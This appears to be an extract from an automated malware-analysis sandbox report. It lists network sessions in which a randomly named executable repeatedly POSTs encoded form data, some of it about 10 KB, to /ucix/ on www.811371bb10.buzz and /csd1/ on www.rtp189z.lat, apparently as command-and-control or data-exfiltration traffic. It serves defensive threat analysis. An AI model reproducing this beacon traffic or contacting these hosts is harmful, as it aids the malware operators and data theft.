Jan 13, 2025 10:21:44.042407990 CET	741	OUT	POST /ucix/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.811371bb10.buzz Origin: http://www.811371bb10.buzz Referer: http://www.811371bb10.buzz/ucix/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 45 6b 75 61 35 6e 75 61 53 45 34 6d 59 55 62 43 77 51 76 37 66 73 47 44 46 54 6b 76 50 53 53 4d 41 76 52 78 57 69 53 4d 72 70 47 70 73 7a 67 74 42 32 37 44 4e 54 4e 62 6a 34 75 48 55 2f 6c 77 6f 53 53 65 4c 31 69 72 51 70 63 32 69 44 75 44 37 4b 57 77 67 4d 64 69 78 67 79 4a 44 78 30 68 7a 71 63 6c 34 74 35 44 62 73 32 77 36 6d 32 4e 70 72 6e 79 4a 48 61 6c 35 45 67 30 64 63 6d 62 30 37 77 61 71 44 4b 75 69 70 49 76 39 64 42 6b 6f 71 4c 77 4f 74 71 55 6d 79 4e 58 66 44 7a 4f 64 65 47 48 79 6c 51 5a 38 56 30 4c 57 61 2f 31 55 69 62 61 4e 67 3d 3d Data Ascii: idTDev6P=CtoA+mPmz+J/Ekua5nuaSE4mYUbCwQv7fsGDFTkvPSSMAvRxWiSMrpGpszgtB27DNTNbj4uHU/lwoSSeL1irQpc2iDuD7KWwgMdixgyJDx0hzqcl4t5Dbs2w6m2NprnyJHal5Eg0dcmb07waqDKuipIv9dBkoqLwOtqUmyNXfDzOdeGHylQZ8V0LWa/1UibaNg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50038	38.22.89.164	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:46.603822947 CET	761	OUT	POST /ucix/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.811371bb10.buzz Origin: http://www.811371bb10.buzz Referer: http://www.811371bb10.buzz/ucix/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 57 56 65 61 2b 77 36 61 44 30 34 6c 64 55 62 43 70 41 76 2f 66 73 36 44 46 52 49 2f 54 30 36 4d 41 4b 39 78 58 6d 47 4d 73 70 47 70 6e 54 67 53 4d 57 37 49 4e 55 46 39 6a 35 53 48 55 2f 68 77 6f 58 32 65 58 53 4f 6f 54 5a 63 34 33 7a 75 42 31 71 57 77 67 4d 64 69 78 67 6d 76 44 78 38 68 7a 59 49 6c 36 4d 35 45 57 4d 32 78 39 6d 32 4e 74 72 6e 32 4a 48 61 69 35 42 42 5a 64 65 65 62 30 34 6b 61 71 53 4b 68 6f 70 49 31 69 74 41 31 34 37 53 2f 49 50 7a 2b 6b 77 56 51 51 7a 32 76 59 59 4c 64 6a 55 78 4f 75 56 51 34 4c 64 32 42 5a 68 6d 54 57 67 4b 53 68 70 35 51 30 65 6c 35 43 6f 49 38 6e 39 6d 30 69 6f 6b 3d Data Ascii: idTDev6P=CtoA+mPmz+J/WVea+w6aD04ldUbCpAv/fs6DFRI/T06MAK9xXmGMspGpnTgSMW7INUF9j5SHU/hwoX2eXSOoTZc43zuB1qWwgMdixgmvDx8hzYIl6M5EWM2x9m2Ntrn2JHai5BBZdeeb04kaqSKhopI1itA147S/IPz+kwVQQz2vYYLdjUxOuVQ4Ld2BZhmTWgKShp5Q0el5CoI8n9m0iok=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50039	38.22.89.164	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:49.223630905 CET	10843	OUT	POST /ucix/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.811371bb10.buzz Origin: http://www.811371bb10.buzz Referer: http://www.811371bb10.buzz/ucix/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 57 56 65 61 2b 77 36 61 44 30 34 6c 64 55 62 43 70 41 76 2f 66 73 36 44 46 52 49 2f 54 30 79 4d 42 38 70 78 57 42 36 4d 74 70 47 70 71 7a 67 54 4d 57 37 5a 4e 53 74 35 6a 35 65 39 55 39 70 77 79 78 36 65 48 6e 36 6f 49 70 63 34 6f 6a 75 45 37 4b 57 66 67 4e 74 6d 78 6a 65 76 44 78 38 68 7a 5a 34 6c 7a 39 35 45 46 63 32 77 36 6d 32 52 70 72 6e 65 4a 48 43 55 35 42 4e 76 63 75 2b 62 31 59 30 61 6f 67 69 68 67 70 49 7a 6a 74 41 74 34 37 76 2f 49 50 76 59 6b 78 68 32 51 78 71 76 56 65 65 71 38 6e 68 6b 79 48 4d 37 65 39 4f 64 42 67 79 76 5a 43 4f 64 77 63 31 71 73 4f 6b 62 48 4a 31 65 30 38 71 51 67 49 46 41 68 48 6b 6f 34 42 36 54 2b 67 37 51 4d 49 55 51 58 62 50 76 71 63 48 58 79 4c 2b 6b 56 67 74 6b 79 6b 54 77 71 5a 42 44 68 35 48 4f 4c 70 4a 75 46 44 64 56 4a 67 4f 4b 38 6f 2b 41 38 6b 75 71 39 6b 61 41 45 65 52 64 49 4c 48 44 61 42 48 4c 46 6c 72 37 73 4d 78 6f 4b 48 57 37 52 63 6f 6e 6e 6a 6e 30 6a 78 62 47 41 38 69 4d 6c 32 42 79 6d [TRUNCATED] Data Ascii: idTDev6P=CtoA+mPmz+J/WVea+w6aD04ldUbCpAv/fs6DFRI/T0yMB8pxWB6MtpGpqzgTMW7ZNSt5j5e9U9pwyx6eHn6oIpc4ojuE7KWfgNtmxjevDx8hzZ4lz95EFc2w6m2RprneJHCU5BNvcu+b1Y0aogihgpIzjtAt47v/IPvYkxh2QxqvVeeq8nhkyHM7e9OdBgyvZCOdwc1qsOkbHJ1e08qQgIFAhHko4B6T+g7QMIUQXbPvqcHXyL+kVgtkykTwqZBDh5HOLpJuFDdVJgOK8o+A8kuq9kaAEeRdILHDaBHLFlr7sMxoKHW7Rconnjn0jxbGA8iMl2BymwqVj4OHDhkK/inRdsZSsNGGF6Uk1oxcrn6zu+jFaiLzdIqTG1Vm4mXRvyM4CBRb7xVOTkw1UZKYplIX6uULB6iRwPsfs4/K4g2uVin39a3BeeaCEQBdG0BdnEc9UDWA7lE3956RpNeZA9sCyvsuB4O1ekPcYJzPHvnhFCOHX1lbIPNwVKaE9wRVDTdpALhRWdpNRGT3LXLB72yyUu5WTs4sFL3+jOIYa7k7u+8dbHSXYjeumQfkRWvmjlMd4cgMMoeYr6qsFi8YC0uj11iJbhEAjbN+jMnjN0OF8eXCewdwBg09CcNzgP9JE3F9GCpNk5KupBUmXElcxqIux2hyG/xgbijeIA7d6MSLIe+73KrS7vG7DsYANKYa2Vg234WhlhHS/mi66MWd9e3ON9Mpp5/WwQEB/M/xyJrDrtkzID/FTeOSEjgISSfcnhJRP2Fy88akLW5CeB/npphFJH3DzXmVWzbIcr6WI+94zUvMyP72L8QCAZQ+cF6xEucOX2+z1IfDd9DKlElTuQ5v/G/DUOgdWdB+Xt4LjRmaFfa7jjieTy1lU3pfMOY80Ub+CtbHJnS7jplst5Rm/5iAcO6o1BAeXkhTHLGZSREv20K2hM67af/jtJiwQVtL6BAHV5d7O7yY6OCFOovqsolkGYMbI0M9FpZjhGtnOzO [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50040	38.22.89.164	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:51.827770948 CET	469	OUT	GET /ucix/?idTDev6P=PvAg9QCS6Z5JTHKbpS7nTnQEYV78sBmDdvenPAgfZzfjFvd/bCKGmpWiozs7PE3CLHF555uBY/gZrXu5AFygOIQKoTuDn9aElepw412NEgoxxpo789p/RNg=&z2=LHT8eHbp3J HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.811371bb10.buzz Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50041	68.65.122.71	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:18.201894045 CET	729	OUT	POST /csd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.rtp189z.lat Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/csd1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 45 5a 7a 66 59 47 39 45 36 32 59 63 69 75 48 4c 69 66 34 39 2b 30 33 70 39 68 43 46 64 59 76 6e 7a 31 69 66 74 36 46 72 69 43 59 39 45 30 65 2b 45 6c 56 70 46 51 65 68 42 4c 73 68 53 39 39 6b 4f 53 30 76 41 4f 42 51 65 78 67 34 77 42 4f 2b 70 57 32 67 41 4e 4e 55 68 44 63 5a 75 37 77 57 71 36 4a 79 58 75 37 41 33 52 52 46 50 2f 51 32 43 35 36 56 66 65 39 4a 31 67 66 61 77 4b 73 56 51 59 78 43 57 69 6c 45 77 73 6b 63 52 55 2f 61 36 63 58 65 67 7a 48 78 38 65 61 49 78 4d 38 75 66 5a 2f 62 43 36 39 47 46 57 45 34 72 30 2b 69 7a 4e 56 33 69 67 3d 3d Data Ascii: idTDev6P=5jf2zjfdd87cEZzfYG9E62YciuHLif49+03p9hCFdYvnz1ift6FriCY9E0e+ElVpFQehBLshS99kOS0vAOBQexg4wBO+pW2gANNUhDcZu7wWq6JyXu7A3RRFP/Q2C56Vfe9J1gfawKsVQYxCWilEwskcRU/a6cXegzHx8eaIxM8ufZ/bC69GFWE4r0+izNV3ig==
Jan 13, 2025 10:22:19.123142004 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:22:18 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 13, 2025 10:22:19.123167038 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50042	68.65.122.71	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:20.753727913 CET	749	OUT	POST /csd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.rtp189z.lat Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/csd1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 57 70 6a 66 55 46 6c 45 38 57 59 62 74 4f 48 4c 72 2f 34 35 2b 30 4c 70 39 6b 6d 56 63 72 4c 6e 79 51 47 66 72 4c 46 72 68 43 59 39 4b 55 65 37 5a 31 56 59 46 51 6a 4c 42 50 77 68 53 38 64 6b 4f 57 77 76 41 39 70 54 63 68 67 36 37 68 4f 38 30 47 32 67 41 4e 4e 55 68 41 67 67 75 2f 55 57 71 72 35 79 58 4d 54 44 2b 78 52 47 49 2f 51 32 47 35 36 52 66 65 38 65 31 68 43 4e 77 50 6f 56 51 64 31 43 57 7a 6c 4c 6c 63 6b 65 63 30 2b 66 71 76 4f 50 75 54 44 38 35 74 48 70 76 66 63 76 61 66 79 42 54 4c 63 52 58 57 67 4c 32 7a 33 57 2b 4f 6f 2b 35 72 72 66 32 67 4b 4d 35 76 71 4f 6e 2f 43 4e 70 45 4c 43 58 46 45 3d Data Ascii: idTDev6P=5jf2zjfdd87cWpjfUFlE8WYbtOHLr/45+0Lp9kmVcrLnyQGfrLFrhCY9KUe7Z1VYFQjLBPwhS8dkOWwvA9pTchg67hO80G2gANNUhAggu/UWqr5yXMTD+xRGI/Q2G56Rfe8e1hCNwPoVQd1CWzlLlckec0+fqvOPuTD85tHpvfcvafyBTLcRXWgL2z3W+Oo+5rrf2gKM5vqOn/CNpELCXFE=
Jan 13, 2025 10:22:21.584534883 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:22:21 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 13, 2025 10:22:21.584578991 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50043	68.65.122.71	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:23.389830112 CET	10831	OUT	POST /csd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.rtp189z.lat Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/csd1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 57 70 6a 66 55 46 6c 45 38 57 59 62 74 4f 48 4c 72 2f 34 35 2b 30 4c 70 39 6b 6d 56 63 72 44 6e 7a 69 4f 66 74 59 64 72 67 43 59 39 56 6b 65 36 5a 31 56 42 46 51 4c 50 42 50 39 44 53 35 5a 6b 4f 31 34 76 49 73 70 54 56 68 67 36 30 42 4f 35 70 57 33 39 41 4e 64 51 68 41 77 67 75 2f 55 57 71 6f 68 79 65 2b 37 44 34 78 52 46 50 2f 51 79 43 35 37 45 66 65 6b 4f 31 68 58 77 77 37 63 56 52 39 6c 43 58 46 52 4c 6e 38 6b 6d 5a 30 2b 35 71 76 7a 58 75 54 65 4e 35 75 61 38 76 59 73 76 59 71 44 59 44 50 59 78 4b 31 59 6f 6a 30 58 72 34 35 38 75 39 73 76 4c 36 43 47 32 6e 73 72 74 38 76 66 76 79 48 4b 44 4a 77 61 59 45 46 59 37 65 67 76 47 58 45 36 33 4c 6b 68 70 2f 4a 4f 79 6a 6d 77 75 48 44 70 70 38 57 39 63 47 30 48 37 77 74 59 52 39 4f 54 62 51 7a 2f 4d 53 4b 2b 65 4f 31 73 2f 58 53 39 74 54 45 6d 6c 64 53 33 42 46 58 62 52 6a 56 79 72 64 72 59 77 63 37 46 50 5a 70 6e 4b 58 49 47 6e 35 47 50 2f 30 6f 66 59 2f 56 4e 61 69 53 48 39 43 31 37 34 75 [TRUNCATED] Data Ascii: idTDev6P=5jf2zjfdd87cWpjfUFlE8WYbtOHLr/45+0Lp9kmVcrDnziOftYdrgCY9Vke6Z1VBFQLPBP9DS5ZkO14vIspTVhg60BO5pW39ANdQhAwgu/UWqohye+7D4xRFP/QyC57EfekO1hXww7cVR9lCXFRLn8kmZ0+5qvzXuTeN5ua8vYsvYqDYDPYxK1Yoj0Xr458u9svL6CG2nsrt8vfvyHKDJwaYEFY7egvGXE63Lkhp/JOyjmwuHDpp8W9cG0H7wtYR9OTbQz/MSK+eO1s/XS9tTEmldS3BFXbRjVyrdrYwc7FPZpnKXIGn5GP/0ofY/VNaiSH9C174u7dtpp4qJR+g01HHHFxy5SjxwT1g7OKF5YZVcQ0ptZLL2mv1p+lqXR6HdPsWhM+HZWQoB8smXq0DC9E3CNo+Z+T5Iu5J7fsk/mg+3Te7BbpJP8Fqi6+/DnthrPXj3/rdGqqOKr6SwIbQInm1ieaj2P38SJr5BHEW3hLMGAxZEOI5zddAwjFSXvoEbVCKRYtxKrwKm3o0cYJfCkV6gG8WE59GLcBq4AZddqUEn2PyKkUbrL3cziAbOgwjhZF7NX5o7UP+UZRqTf2RBv7vUhelSUMNZOTlff1tyf7quF/A7HVujG3JV1w/Q5ds0o6Bo3ZEEs2YbvvZA1zX/t7OVk6ltrDeo7aHNLAFnZK7uiHFyMpEQjaX4Fk7gPKRVXuaosEEvk0MNxVV767FP9vA2jfwJYDQPgVWgJoXN21s3j+cBSIhrC4K1FUPUeYSTBxluqd7MsAUrPbScpf/8BI/zWLEMscajGozO3hPj5p2hfSJmMfmAHj+leF6vADPYgTowu33cE9lhfmDewE+RRyrUggGDCHiWkQSsezMjPMfaf8BaAp9DMHZ8c6plNmcGTEw7ei8Fkii93mX+HNM0ZeJor4tWNkRkqyp4Fboxy3+gEdwKVj1cXovVtVTZB3AoUk6TSvcQIKK4TnPC3D5KK7fu7Mt/FJMQ58AF6DYr4h [TRUNCATED]
Jan 13, 2025 10:22:24.168641090 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:22:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 13, 2025 10:22:24.168668032 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50044	68.65.122.71	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
